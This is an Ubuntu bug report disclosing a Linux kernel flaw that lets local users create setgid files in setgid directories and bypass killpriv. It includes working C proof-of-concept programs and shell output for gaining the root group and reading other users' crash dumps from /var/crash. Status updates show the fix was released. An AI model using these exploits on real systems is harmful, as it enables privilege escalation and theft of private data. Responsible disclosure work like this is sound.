other users' coredumps can be read via setgid directory and killpriv bypass
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
linux (Ubuntu) |
Fix Released
|
Medium
|
Tyler Hicks | ||
Trusty |
Fix Released
|
Medium
|
Tyler Hicks | ||
Xenial |
Fix Released
|
Medium
|
Tyler Hicks | ||
Bionic |
Fix Released
|
Medium
|
Tyler Hicks | ||
Cosmic |
Won't Fix
|
Medium
|
Tyler Hicks |
Bug Description
Note: I am both sending this bug report to <email address hidden> and filing it in
the Ubuntu bugtracker because I can't tell whether this counts as a kernel bug
or as a Ubuntu bug. You may wish to talk to each other to determine the best
place to fix this.
I noticed halfdog's old writeup at
https:/
, describing essentially the following behavior in combination with a
trick for then writing to the resulting file without triggering the
killpriv logic:
=============
user@debian:
user@debian:
#include <fcntl.h>
int main(void) { open("dir/file", O_RDONLY|O_CREAT, 02755); }
user@debian:
user@debian:
user@debian:
-rwxr-sr-x 1 user root 0 Jun 25 22:03 dir/file
=============
Two patches for this were proposed on LKML back then:
"[PATCH 1/2] fs: Check f_cred instead of current's creds in
should_
https:/
"[PATCH 2/2] fs: Harden against open(..., O_CREAT, 02777) in a setgid directory"
https:/
However, as far as I can tell, neither of them actually landed.
You can also bypass the killpriv logic with fallocate() and mmap() -
fallocate() permits resizing the file without triggering killpriv,
mmap() permits writing without triggering killpriv (the mmap part is mentioned
at
https:/
):
=============
user@debian:
user@debian:
#define _GNU_SOURCE
#include <stdlib.h>
#include <fcntl.h>
#include <err.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <string.h>
int main(void) {
int src_fd = open("/usr/bin/id", O_RDONLY);
if (src_fd == -1)
err(1, "open 2");
struct stat src_stat;
if (fstat(src_fd, &src_stat))
err(1, "fstat");
int src_len = src_stat.st_size;
char *src_mapping = mmap(NULL, src_len, PROT_READ, MAP_PRIVATE, src_fd, 0);
if (src_mapping == MAP_FAILED)
err(1, "mmap 2");
int fd = open("dir/file", O_RDWR|
if (fd == -1)
err(1, "open");
if (fallocate(fd, 0, 0, src_len))
err(1, "fallocate");
char *mapping = mmap(NULL, src_len, PROT_READ|
if (mapping == MAP_FAILED)
err(1, "mmap");
memcpy(mapping, src_mapping, src_len);
munmap(mapping, src_len);
close(fd);
close(src_fd);
execl(
err(1, "execl");
}
user@debian:
user@debian:
uid=1000(user) gid=1000(user) egid=0(root)
groups=
=============
sys_copy_
supported filesystems, but I haven't tested that one so far.
On Ubuntu 18.04 (bionic), /var/crash is mode 03777, group "whoopsie", and
contains group-readable crashdumps in some custom format, so you can use this
issue to steal other users' crashdumps:
=============
user@ubuntu-
total 296
-rw-r----- 1 user whoopsie 16527 Jun 25 22:27 _usr_bin_
-rw-r----- 1 root whoopsie 50706 Jun 25 21:51 _usr_bin_id.0.crash
-rw-r----- 1 user whoopsie 51842 Jun 25 21:42 _usr_bin_
-rw-r----- 1 user whoopsie 152095 Jun 25 21:43 _usr_bin_
-rw-r----- 1 root whoopsie 18765 Jun 26 00:42 _usr_bin_
user@ubuntu-
cat: /var/crash/
user@ubuntu-
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <err.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <string.h>
int main(int argc, char **argv) {
if (argc != 2) {
printf("usage: ./fallocate <file_to_read>");
return 1;
}
int src_fd = open("/bin/cat", O_RDONLY);
if (src_fd == -1)
err(1, "open 2");
struct stat src_stat;
if (fstat(src_fd, &src_stat))
err(1, "fstat");
int src_len = src_stat.st_size;
char *src_mapping = mmap(NULL, src_len, PROT_READ, MAP_PRIVATE, src_fd, 0);
if (src_mapping == MAP_FAILED)
err(1, "mmap 2");
unlink(
int fd = open("/
if (fd == -1)
err(1, "open");
if (fallocate(fd, 0, 0, src_len))
err(1, "fallocate");
char *mapping = mmap(NULL, src_len, PROT_READ|
if (mapping == MAP_FAILED)
err(1, "mmap");
memcpy(mapping, src_mapping, src_len);
munmap(mapping, src_len);
close(fd);
execl(
err(1, "execl");
}
user@ubuntu-
user@ubuntu-
user@ubuntu-
total 384
-rwxr-sr-x 1 user whoopsie 35064 Jul 3 19:22 privileged_cat
-rw-r----- 1 user whoopsie 16527 Jun 25 22:27 _usr_bin_
-rw-r----- 1 root whoopsie 50706 Jun 25 21:51 _usr_bin_id.0.crash
-rw-r--r-- 1 user whoopsie 50706 Jul 3 19:22 _usr_bin_
-rw-r----- 1 user whoopsie 51842 Jun 25 21:42 _usr_bin_
-rw-r----- 1 user whoopsie 152095 Jun 25 21:43 _usr_bin_
-rw-r----- 1 root whoopsie 18765 Jun 26 00:42 _usr_bin_
user@ubuntu-
user@ubuntu-
user@ubuntu-
user@ubuntu-
user@ubuntu-
root_crash_
=============
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.
CVE References
- 2016-10208
- 2017-11472
- 2017-11473
- 2017-14991
- 2017-15649
- 2017-16526
- 2017-16527
- 2017-16529
- 2017-16531
- 2017-16532
- 2017-16533
- 2017-16535
- 2017-16536
- 2017-16537
- 2017-16538
- 2017-16643
- 2017-16644
- 2017-16645
- 2017-16650
- 2017-16911
- 2017-16912
- 2017-16913
- 2017-16914
- 2017-17558
- 2017-18255
- 2017-18270
- 2017-2583
- 2017-2584
- 2017-2671
- 2017-5549
- 2017-5715
- 2017-5897
- 2017-6345
- 2017-6348
- 2017-7518
- 2017-7645
- 2017-8831
- 2017-9984
- 2018-1000204
- 2018-10021
- 2018-10087
- 2018-10124
- 2018-10323
- 2018-10675
- 2018-10840
- 2018-10877
- 2018-10881
- 2018-1092
- 2018-1093
- 2018-10940
- 2018-1108
- 2018-11412
- 2018-11506
- 2018-12232
- 2018-12233
- 2018-12904
- 2018-13094
- 2018-13405
- 2018-13406
no longer affects: | whoopsie (Ubuntu) |
no longer affects: | whoopsie (Ubuntu Trusty) |
no longer affects: | whoopsie (Ubuntu Xenial) |
no longer affects: | whoopsie (Ubuntu Bionic) |
no longer affects: | whoopsie (Ubuntu Cosmic) |
Changed in linux (Ubuntu Trusty): | |
status: | In Progress → Fix Committed |
Changed in linux (Ubuntu Xenial): | |
status: | In Progress → Fix Committed |
Changed in linux (Ubuntu Bionic): | |
status: | In Progress → Fix Committed |
Changed in linux (Ubuntu Cosmic): | |
status: | In Progress → Won't Fix |
Changed in linux (Ubuntu): | |
status: | In Progress → Fix Released |
This is now fixed upstream in Linus' tree: https:/ /git.kernel. org/pub/ scm/linux/ kernel/ git/torvalds/ linux.git/ commit/ ?id=0fa3ecd8784 8c9c93c2c828ef4 c3a8ca36ce46c7
Note that this fix does not have a CC stable marker.